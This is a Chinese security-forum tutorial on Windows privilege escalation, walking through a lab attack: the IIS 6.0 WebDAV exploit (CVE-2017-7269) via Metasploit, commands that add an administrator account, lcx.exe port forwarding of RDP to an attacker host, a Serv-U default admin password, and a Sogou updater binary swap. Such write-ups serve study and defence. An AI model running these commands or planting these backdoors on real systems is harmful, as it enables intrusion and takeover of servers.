用户
搜索
  • TA的每日心情
    开心
    2 小时前
  • 签到天数: 262 天

    连续签到: 50 天

    [LV.8]以坛为家I

    i春秋-核心白帽

    Rank: 4

    10

    主题

    62

    帖子

    1316

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2019-11-4

    核心白帽春秋游侠白帽高手积极活跃奖

    发表于 2021-5-27 15:49:04 03351
    本帖最后由 和風 于 2021-5-27 15:57 编辑

    提权的概念
    在入侵过程中,通过各种办法和漏洞,提高攻击者在服务器中的权限,从而以便控制全局的过程就叫做提权。例如:windows系统--->user(guest)--->system;Linux系统--->user--->root
    在web渗透中,从最开始的webshell获取的权限可能仅仅是中间件的权限,可执行的操作控制有限,攻击者往往会通过提权的方式来提升已有的权限,从而执行更多的操作。
    图片1.png
    提权的方法
    一、系统漏洞提权
    (1)获取操作系统类型以及版本号
    (2)根据获取的系统版本号在互联网搜索exp
    (3)尝试利用exp获取权限
    (4)尝试反弹shell
    二、数据库提权
    (1)mysql数据库——udf提权
    (2)数据库提权——mof提权
    (3)数据库提权——反弹端口提权
    (4)数据库提权——启动项提权
    三、第三方软件/服务提权
    (1)通过第三方软件漏洞进行提权
    (2)通过服务端口、服务协议漏洞进行提权
    第三方软件提权
    第三方软件指的是该非线性编辑系统生产商以外的软件公司[/url]提供的软件,功能十分强大,有些甚至是从工作站转移过来的,可以这么说,非线性编辑系统之所以能做到效果变幻莫测,匪夷所思,吸引众人的视线,完全取决于第三方软件。第三方软件提权,就是利用第三方软件存在的漏洞来进行获取一个权限的操作。


    中间件IIS版本漏洞提权
    提权思路:
    IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。
    首先对目标靶机进行一个信息收集,通过椰树发现SQL注入漏洞和IIS写漏洞权限
    图片2.png
    通过椰树软件读取web环境,发现组件IIS6.0
    图片3.png
    nmap -sV O 10.10.10.130扫描版本信息
    图片4.png
    nmap --script=vuln 10.10.10.130扫描可能存在的漏洞
    图片5.png
    图片6.png
    exp代码下载https://github.com/zcgonvh/cve-2017-7269
    QQ图片20210527155219.png
    把下载好的exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
    Kali运行use exploit/windows/iis/cve_2017_7269,然后执行exploit模块添加参数信息
    图片7.png
    图片8.png
    exploit攻击成果后进入到meterpreter界面
    图片9.png
    在靶机上创建一个文件夹su,并将iis62.exe上传到文件夹中用于提权操作
    图片10.png
    图片11.png
    利用iis62.exe可以做到提权的操作,添加系统用户等等
    图片12.png
    Iis62.exe “net user su su123/add”添加用户su,密码为su123
    图片13.png
    图片14.png
    将su用户添加到系统组
    Iis62.exe “net localgroup administrators su /add”
    图片15.png
    net localgroup administrators查看系统组下有没有添加成功
    图片16.png
    在靶机上输入以下命令,让靶机开启远程端口转发
    Lcx.exe -slave 192.168.0.106 4444 10.10.10.130 3389,将目标靶机的3389端口转发到本机的4444端口上
    图片17.png
    在攻击机输入以下命令,开启端口监听
    Lcx.exe -listen 4444 33891
    图片18.png
    开启远程命令,连接上靶机并输入账户密码即可
    图片19.png


    Server-U提权
    提权思路:
    Serv-U是一种被广泛运用的FTP服务器软件,以系统用户身份执行远程代码。
    Server-U默认帐号密码LocalAdministrator/#l@$ak#.lk;0@P 如果被修改了,可下载安装目录下的serverAdmin.exe 使用16进制查看器(winHex)打开,查找LocalAdministrator在后面便可看到相应的密码
    在上传小马文件shell.aspx后再上传一个大马文件,利用该大马文件的模块servu-提权来创建系统用户
    图片20.png
    可以利用servu模块执行cmd命令,添加用户执行成功
    图片21.png
    看看系统用户发现添加成功
    图片22.png
    在shell界面也能看到添加了系统用户flag
    图片23.png


    Sogou输入法提权
    提权思路
    由于搜狗输入法默认设置是自动更新(很少有人去更改这个设置),更新程序没有对exe做任何校验直接在输入法升级时调用运行,导致可以执行恶意代码
    在获取webshell的前提下,在D盘下找到了搜狗的路径
    图片24.png
    编辑一个PinyinUp的bat文件,通过转义软件编译成PinyinUp.exe,里面存放着恶意代码
    图片25.png
    上传我们的PinyinUp.exe文件,把之前搜狗路径下的PinyinUp文件改个名字
    图片26.png
    当用户更新词库的时候就会调用我们的PinyinUp.exe程序,然后生成用户密码
    图片27.png
    用户添加成功
    图片28.png
    图片29.png

    剑未佩妥出门已是江湖
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册